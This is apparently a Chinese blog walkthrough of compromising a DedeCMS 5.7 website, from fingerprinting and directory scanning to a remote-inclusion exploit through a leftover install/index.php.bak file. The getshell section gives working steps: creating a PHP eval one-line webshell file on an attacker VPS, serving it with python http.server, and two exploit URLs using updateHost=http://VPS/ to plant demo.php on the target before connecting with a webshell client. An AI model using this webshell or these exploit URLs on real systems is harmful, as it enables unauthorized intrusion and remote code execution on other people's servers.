从信息收集到getshell

简介: 从信息收集到getshell

00x01 信息收集

       拿到目标url云悉指纹搞一波,指纹没匹对出来,回到网站

640.png

       虽然没匹对出指纹,但随便浏览个网页看到url总感觉是什么

 640.png

那就谷歌一下

640.jpg

灵感不就来了,那么初步判断有可能是dedecms尝试了几个dedecms的目录,均是not found

 640.png

既然是开源的,那我就去找下源码,看看

640.png

看到有个robots.txt,看一眼

 640.png

还真有,那就匹对一下,八九不离十,在看看member还是没有,访问都没有结果,上个御剑扫一下目录看看,

 640.png

看到个photo我觉得大有文章,访问一下

640.png

我的天啊,出来了,还真是dedecms,访问url确定一下:

 640.jpg

没错了,确定为织梦CMS搭建的网站,那怎么确定用的织梦什么版本呢,我们可以这样判断

photo/data/admin/ver.txt

640.png

Google搜索一下,锁定一下版本应该为5.7左右

640.png

确定了版本之后,其实我们从前面的信息(容器版本:apache2.2,存在install文件)可以大致的锁定一个漏洞----织梦远程包含漏洞

00x02 Getshell

       利用条件:首先,是目标站安装完cms后并没有删除install文件夹,其次网站建站容器版本过低,当Apache检测到一个文件有多个扩展名时,如1.php.bak,会从右向左判断,直到有一个apache认识的扩展名。

640.png

我觉得基本稳了,开干。

在外网VPS创建一个文件dedecms/demodata.a.txt
具体操作如下:
1 mkdir dedecms
2 echo "<?php @eval($_POST[cmd]);?>">dedecms/demodata.a.txt
3 python3 -m http.server

 640.png

访问如下url:

http://xxx.com/photo/install/index.php.bak?step=11&insLockfile=a&s_lang=a&install_demo_name=../data/admin/config_update.php

640.png

http://xxx.com/photo/install/index.php.bak?step=11&insLockfile=a&s_lang=a&install_demo_name=demo.php&updateHost=http://VPS/

640.png

如果成功的话,即可生成/install/demo.php,我觉得没问题了,上菜刀

640.jpg


相关文章
|
7月前
|
网络协议 Linux Windows
kali-信息收集
kali-信息收集
67 0
|
域名解析 网络协议 安全
信息收集的工具你听过几种(盘点信息收集)
信息收集的工具你听过几种(盘点信息收集)
信息收集的工具你听过几种(盘点信息收集)
|
2月前
|
网络协议 搜索推荐 Linux
信息搜集工具:Maltego
信息搜集工具:Maltego
70 0
|
5月前
|
安全 Linux 应用服务中间件
【信息收集】 网站信息收集
该文档提供了一套方法来检测和识别网络上运行的操作系统、网站服务、容器类型以及WAF(Web应用防火墙)
51 0
|
7月前
|
存储 安全 网络安全
Pikachu敏感信息泄露通关解析
Pikachu敏感信息泄露通关解析
收集 macwk.com 的替代网站
macwk.com 在 2022-10-05 关站,域名停止解析,已经打不开了。翻了很多资料,收集了几个网站作为替代,大家有需要可以试试,如果有更好的麻烦告诉我哈哈!
124 0
|
Python
一款好用的fofa信息搜集脚本
一款好用的fofa信息搜集脚本
179 0
|
XML 存储 网络协议
渗透测试内网渗透之信息收集(二)
渗透测试内网渗透之信息收集(二)
|
网络协议 网络安全
Metasploit信息收集
Metasploit信息收集
96 0
Metasploit信息收集
|
域名解析 安全 搜索推荐
安全工具-e7信息收集
安全工具-e7信息收集
安全工具-e7信息收集